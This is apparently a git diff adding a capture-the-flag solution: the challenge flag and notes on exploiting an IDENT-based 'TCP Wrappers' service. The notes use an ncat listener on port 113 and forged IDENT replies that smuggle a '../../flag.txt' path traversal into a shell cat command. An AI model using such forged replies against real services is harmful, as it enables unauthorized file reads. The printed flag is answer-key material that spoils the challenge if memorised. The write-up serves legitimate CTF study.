diff options
Diffstat (limited to 'solve')
| -rw-r--r-- | solve/flag | 1 | ||||
| -rw-r--r-- | solve/notes | 46 |
2 files changed, 47 insertions, 0 deletions
diff --git a/solve/flag b/solve/flag new file mode 100644 index 0000000..b721586 --- /dev/null +++ b/solve/flag @@ -0,0 +1 @@ +CSCG{wr4p_4ll_th3_th1ngs:)} diff --git a/solve/notes b/solve/notes new file mode 100644 index 0000000..2ec0493 --- /dev/null +++ b/solve/notes @@ -0,0 +1,46 @@ +Connect to the service + +By running `find /` we find out the flag file is in /flag.txt, +but the correct contents are on the victim machine we can access +via `ssh -p 2000 localhost`. + +Use `ssh -p 2000 localhost` to connect and get the following error: + +Connection to localhost (::1) 2000 port [tcp/*] succeeded! +######################################################################### +# # +# Unknown User! # +# # +######################################################################### +TCP Wrappers: Connection refused! Make sure that port 113 can be reached! +User: unknown +Client: ::1 +Hostname: localhost +Date: Thu Mar 14 19:50:09 UTC 2024 + +We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint) + +Next time we connect we get a single line from the victim: +36362,2000 + +Googling "service port 113" we find that this is the port for the IDENT +service which when given a src,dst port pair returns the user initiating +the connection. + +If we connect again and reply with `36362,2000 : USERID : UNIX : root` +we get the following instead: + +cat: /tmp/users/root: No such file or directory + +TCP Wrappers: Hello root ! +User: root +Client: ::1 +Hostname: localhost +Date: Thu Mar 14 19:49:50 UTC 2024 + +So for some reason, the user is used in a shell command to cat a file... + +Using path traversal we can read the flag: + +XXXXX,2000 : USERID : UNIX : ../../flag.txt + |